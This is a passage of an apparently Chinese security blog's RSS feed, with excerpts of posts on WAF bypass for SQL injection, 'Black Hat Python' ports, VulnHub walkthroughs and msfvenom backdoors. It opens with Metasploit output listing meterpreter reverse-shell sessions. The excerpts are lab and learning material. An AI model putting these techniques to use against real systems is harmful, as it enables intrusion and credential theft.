----------&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  &lt;span class=&#34;m&#34;&gt;1&lt;/span&gt;         meterpreter x86/windows  WY-PC&lt;span class=&#34;se&#34;&gt;\W&lt;/span&gt;Y @ WY-PC     192.168.142.19:4444 -&amp;gt; 192.168.142.24:52612 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;192.168.200.128&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  &lt;span class=&#34;m&#34;&gt;2&lt;/span&gt;         meterpreter x86/windows  W-Y-PC&lt;span class=&#34;se&#34;&gt;\W&lt;/span&gt;-Y @ W-Y-PC  192.168.142.19:4444 -&amp;gt; 192.168.142.101:49230 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;192.168.142.101&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;msf5 exploit&lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;multi/handler&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &amp;gt; &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&#xA;&lt;p&gt;这里要特别注意两个位置：&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>SQL注入之安全狗绕过</title>
      <link>https://www.rainwo.xyz/posts/%E5%AE%89%E5%85%A8%E7%8B%97%E7%BB%95%E8%BF%87/</link>
      <pubDate>Wed, 28 Oct 2020 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/posts/%E5%AE%89%E5%85%A8%E7%8B%97%E7%BB%95%E8%BF%87/</guid>
      <description>&lt;blockquote&gt;&lt;p&gt;最近在网上挖洞时，总会遇到烦人的安全狗，研究了一天发现绕过安全狗出奇的简单，只需要语法犀利即可。&lt;/p&gt;&#xA;&lt;/blockquote&gt;&#xA;&lt;h2 class=&#34;relative group&#34;&gt;前言：&#xA;    &lt;div id=&#34;前言&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e5%89%8d%e8%a8%80&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&lt;p&gt;相信在网络上做渗透测试时，总会遇到如下情况：&lt;/p&gt;&#xA;&lt;p&gt;&lt;figure&gt;&lt;img&#xA;    class=&#34;my-0 rounded-md&#34;&#xA;    loading=&#34;lazy&#34;&#xA;    decoding=&#34;async&#34;&#xA;    fetchpriority=&#34;auto&#34;&#xA;    alt=&#34;在这里插入图片描述&#34;&#xA;    width=&#34;872&#34;&#xA;    height=&#34;405&#34;&#xA;    src=&#34;https://www.rainwo.xyz/posts/%E5%AE%89%E5%85%A8%E7%8B%97%E7%BB%95%E8%BF%87/98e5fa6702f96ead59a2cea6689874b0_hu_fa80d87ec36eb0c2.png&#34;&#xA;    srcset=&#34;https://www.rainwo.xyz/posts/%E5%AE%89%E5%85%A8%E7%8B%97%E7%BB%95%E8%BF%87/98e5fa6702f96ead59a2cea6689874b0_hu_fa80d87ec36eb0c2.png 800w, https://www.rainwo.xyz/posts/%E5%AE%89%E5%85%A8%E7%8B%97%E7%BB%95%E8%BF%87/98e5fa6702f96ead59a2cea6689874b0.png 1280w&#34;&#xA;    sizes=&#34;(min-width: 768px) 50vw, 65vw&#34;&#xA;    data-zoom-src=&#34;https://www.rainwo.xyz/posts/%E5%AE%89%E5%85%A8%E7%8B%97%E7%BB%95%E8%BF%87/98e5fa6702f96ead59a2cea6689874b0.png&#34;&gt;&lt;/figure&gt;&#xA;&lt;/p&gt;&#xA;&lt;p&gt;这是网站管理员在服务器上安装了安全狗，安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能（结合安全狗云安全中心使用）等模块。能够为用户提供实时的网站安全防护，避免各类针对网站的攻击所带来的危害。我们这次实验就是针对sql注入，绕过安全狗的防护机制。话不多说，下面我们开始这次实验。&lt;/p&gt;&#xA;&#xA;&lt;h2 class=&#34;relative group&#34;&gt;实验环境：&#xA;    &lt;div id=&#34;实验环境&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e5%ae%9e%e9%aa%8c%e7%8e%af%e5%a2%83&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&lt;p&gt;操作系统：Windows Server 2008 R2&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>《Python黑帽子》python3代码实现(第五章)</title>
      <link>https://www.rainwo.xyz/posts/%E7%AC%AC%E4%BA%94%E7%AB%A0-web%E6%94%BB%E5%87%BB/</link>
      <pubDate>Wed, 21 Oct 2020 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/posts/%E7%AC%AC%E4%BA%94%E7%AB%A0-web%E6%94%BB%E5%87%BB/</guid>
      <description>&lt;h2 class=&#34;relative group&#34;&gt;第五章 Web攻击&#xA;    &lt;div id=&#34;第五章-web攻击&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e7%ac%ac%e4%ba%94%e7%ab%a0-web%e6%94%bb%e5%87%bb&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&#xA;&lt;h3 class=&#34;relative group&#34;&gt;Web的套接字函数库：&lt;del&gt;urllib2&lt;/del&gt; （&lt;strong&gt;Requests&lt;/strong&gt;）&#xA;    &lt;div id=&#34;web的套接字函数库urllib2-requests&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#web%e7%9a%84%e5%a5%97%e6%8e%a5%e5%ad%97%e5%87%bd%e6%95%b0%e5%ba%93urllib2-requests&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h3&gt;&#xA;&lt;p&gt;这里原著中python2所使用的urllib2模块要被淘汰了，这里我们使用python3的requests模块实现相同的功能。&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>VulnHub靶场系列：Chili)</title>
      <link>https://www.rainwo.xyz/posts/vulnhub%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97chili/</link>
      <pubDate>Mon, 05 Oct 2020 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/posts/vulnhub%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97chili/</guid>
      <description>&lt;h1 class=&#34;relative group&#34;&gt;VulnHub靶场系列：Chili&#xA;    &lt;div id=&#34;vulnhub靶场系列chili&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#vulnhub%e9%9d%b6%e5%9c%ba%e7%b3%bb%e5%88%97chili&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h1&gt;&#xA;&lt;blockquote&gt;&lt;p&gt;刚刚在VulnHub官网上找了些简单的靶机，感觉这个还挺适合新手的&lt;/p&gt;&#xA;&lt;/blockquote&gt;&#xA;&lt;h2 class=&#34;relative group&#34;&gt;环境部署：&#xA;    &lt;div id=&#34;环境部署&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e7%8e%af%e5%a2%83%e9%83%a8%e7%bd%b2&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&lt;div class=&#34;highlight-wrapper&#34;&gt;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-text&#34; data-lang=&#34;text&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;https://download.vulnhub.com/chili/Chili.ova&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&#xA;&#xA;&lt;h2 class=&#34;relative group&#34;&gt;实战：&#xA;    &lt;div id=&#34;实战&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e5%ae%9e%e6%88%98&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&lt;p&gt;首先使用工具扫描靶机所在网段，得到靶机IP：&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>VulnHub靶场系列：Flick)</title>
      <link>https://www.rainwo.xyz/posts/vulnhub%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97flick/</link>
      <pubDate>Sat, 03 Oct 2020 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/posts/vulnhub%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97flick/</guid>
      <description>&lt;h1 class=&#34;relative group&#34;&gt;VulnHub靶场系列：Flick&#xA;    &lt;div id=&#34;vulnhub靶场系列flick&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#vulnhub%e9%9d%b6%e5%9c%ba%e7%b3%bb%e5%88%97flick&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h1&gt;&#xA;&lt;blockquote&gt;&lt;p&gt;今天意外看到一个VulnHub上的一个靶场的WriteUp，觉得挺有意思，所以自己试着做一遍并记录下来。&lt;/p&gt;&#xA;&lt;/blockquote&gt;&#xA;&lt;h2 class=&#34;relative group&#34;&gt;环境部署：&#xA;    &lt;div id=&#34;环境部署&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e7%8e%af%e5%a2%83%e9%83%a8%e7%bd%b2&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&lt;p&gt;下载靶场并导入到VMware中：&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>Msfvenom生成后门及运用</title>
      <link>https://www.rainwo.xyz/posts/msfvenom%E7%94%9F%E6%88%90%E5%90%8E%E9%97%A8%E5%8F%8A%E8%BF%90%E7%94%A8/</link>
      <pubDate>Thu, 01 Oct 2020 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/posts/msfvenom%E7%94%9F%E6%88%90%E5%90%8E%E9%97%A8%E5%8F%8A%E8%BF%90%E7%94%A8/</guid>
      <description>&lt;h1 class=&#34;relative group&#34;&gt;Msfvenom生成后门及运用&#xA;    &lt;div id=&#34;msfvenom生成后门及运用&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#msfvenom%e7%94%9f%e6%88%90%e5%90%8e%e9%97%a8%e5%8f%8a%e8%bf%90%e7%94%a8&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h1&gt;&#xA;&lt;blockquote&gt;&lt;p&gt;本篇文章将会使用msfvenom来创建木马，然后通过msfconsole中的expoit/multi/handler来反弹靶机shell。&lt;/p&gt;&#xA;&lt;/blockquote&gt;&#xA;&lt;h2 class=&#34;relative group&#34;&gt;后门的生成：&#xA;    &lt;div id=&#34;后门的生成&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e5%90%8e%e9%97%a8%e7%9a%84%e7%94%9f%e6%88%90&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&lt;p&gt;首先通过各种操作系统，脚本语言来生成后门：&#xA;常用参数说明：&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>《Python黑帽子》python3代码实现(第四章)</title>
      <link>https://www.rainwo.xyz/posts/%E7%AC%AC%E5%9B%9B%E7%AB%A0-scapy-%E7%BD%91%E7%BB%9C%E7%9A%84%E6%8E%8C%E6%8E%A7%E8%80%85/</link>
      <pubDate>Thu, 03 Sep 2020 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/posts/%E7%AC%AC%E5%9B%9B%E7%AB%A0-scapy-%E7%BD%91%E7%BB%9C%E7%9A%84%E6%8E%8C%E6%8E%A7%E8%80%85/</guid>
      <description>&lt;h1 class=&#34;relative group&#34;&gt;第四章 Scapy: 网络的掌控者&#xA;    &lt;div id=&#34;第四章-scapy-网络的掌控者&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e7%ac%ac%e5%9b%9b%e7%ab%a0-scapy-%e7%bd%91%e7%bb%9c%e7%9a%84%e6%8e%8c%e6%8e%a7%e8%80%85&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h1&gt;&#xA;&#xA;&lt;h5 class=&#34;relative group&#34;&gt;&lt;em&gt;窃取Email认证&lt;/em&gt;&#xA;    &lt;div id=&#34;窃取email认证&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e7%aa%83%e5%8f%96email%e8%ae%a4%e8%af%81&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h5&gt;&#xA;&lt;p&gt;在我们敲写这一段程序之前我们需要知道&lt;strong&gt;scapy是不支持Windows操作系统的&lt;/strong&gt;，所以此章节所有的脚本都必须在Linux系统上面运行，接下来我们简单了解下嗅探器&lt;code&gt;sniff()&lt;/code&gt;方法：&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>《Python黑帽子》python3代码实现(第三章)</title>
      <link>https://www.rainwo.xyz/posts/%E7%AC%AC%E4%B8%89%E7%AB%A0-%E7%BD%91%E7%BB%9C%E5%8E%9F%E5%A7%8B%E5%A5%97%E6%8E%A5%E5%AD%97%E5%92%8C%E6%B5%81%E9%87%8F%E5%97%85%E6%8E%A2/</link>
      <pubDate>Wed, 02 Sep 2020 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/posts/%E7%AC%AC%E4%B8%89%E7%AB%A0-%E7%BD%91%E7%BB%9C%E5%8E%9F%E5%A7%8B%E5%A5%97%E6%8E%A5%E5%AD%97%E5%92%8C%E6%B5%81%E9%87%8F%E5%97%85%E6%8E%A2/</guid>
      <description>&lt;h1 class=&#34;relative group&#34;&gt;第三章 网络：原始套接字和流量嗅探&#xA;    &lt;div id=&#34;第三章-网络原始套接字和流量嗅探&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e7%ac%ac%e4%b8%89%e7%ab%a0-%e7%bd%91%e7%bb%9c%e5%8e%9f%e5%a7%8b%e5%a5%97%e6%8e%a5%e5%ad%97%e5%92%8c%e6%b5%81%e9%87%8f%e5%97%85%e6%8e%a2&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h1&gt;&#xA;&#xA;&lt;h6 class=&#34;relative group&#34;&gt;&lt;em&gt;Windows上和Linux上的包嗅探&lt;/em&gt;&#xA;    &lt;div id=&#34;windows上和linux上的包嗅探&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#windows%e4%b8%8a%e5%92%8clinux%e4%b8%8a%e7%9a%84%e5%8c%85%e5%97%85%e6%8e%a2&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h6&gt;&#xA;&lt;p&gt;在示例中，我们首先导入socket与os模块，根据os.name判断主机操作系统，该变量属性当前只注册了三个值，具体如下：&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>《Python黑帽子》python3代码实现(第二章)</title>
      <link>https://www.rainwo.xyz/posts/python-black-hat/</link>
      <pubDate>Mon, 24 Aug 2020 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/posts/python-black-hat/</guid>
      <description>&lt;h1 class=&#34;relative group&#34;&gt;《Python黑帽子》代码实现&#xA;    &lt;div id=&#34;python黑帽子代码实现&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#python%e9%bb%91%e5%b8%bd%e5%ad%90%e4%bb%a3%e7%a0%81%e5%ae%9e%e7%8e%b0&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h1&gt;&#xA;&lt;p&gt;本篇笔记全部用python3实现，本人大一在校生第一次写博客，有错误之处希望大家积极指出。&#xA;参考大佬博客：&#xA;&lt;a href=&#34;https://www.cnblogs.com/zhangyuxiang666/p/11010581.html&#34;  target=&#34;_blank&#34; rel=&#34;noreferrer&#34;&gt;https://www.cnblogs.com/zhangyuxiang666/p/11010581.html&lt;/a&gt;&#xA;&lt;a href=&#34;https://blog.csdn.net/qq_39038028/article/details/72860112&#34;  target=&#34;_blank&#34; rel=&#34;noreferrer&#34;&gt;https://blog.csdn.net/qq_39038028/article/details/72860112&lt;/a&gt;&lt;/p&gt;&#xA;&#xA;&lt;h1 class=&#34;relative group&#34;&gt;第二章 网络基础:&#xA;    &lt;div id=&#34;第二章-网络基础&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e7%ac%ac%e4%ba%8c%e7%ab%a0-%e7%bd%91%e7%bb%9c%e5%9f%ba%e7%a1%80&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h1&gt;&#xA;&#xA;&lt;h5 class=&#34;relative group&#34;&gt;&lt;em&gt;创建Tcp客户端（tcpClient.py):&lt;/em&gt;&#xA;    &lt;div id=&#34;创建tcp客户端tcpclientpy&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e5%88%9b%e5%bb%batcp%e5%ae%a2%e6%88%b7%e7%ab%aftcpclientpy&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h5&gt;&#xA;&lt;p&gt;示例中引用了首先导入socket模块，使用&lt;code&gt;socket()&lt;/code&gt;方法来创建套接字并实例化对象，&lt;code&gt;AF_INET&lt;/code&gt;表明IPv4地址，&lt;code&gt;SOCK_STREAM&lt;/code&gt;表明是关于TCP套接字，然后使用&lt;code&gt;connect()&lt;/code&gt;方法连接tcp服务端，使用&lt;code&gt;send()&lt;/code&gt;和&lt;code&gt;recv()&lt;/code&gt;方法来发送和接受数据，这里需要注意的是python3套接字的传输需要将数据转为&lt;strong&gt;byte&lt;/strong&gt;的形式，使数据可视化又需要解码为&lt;strong&gt;str&lt;/strong&gt;，这里是简单的构造了一个http请求。&lt;/p&gt;</description>
      
    </item>
    
  </channel>
</rss>
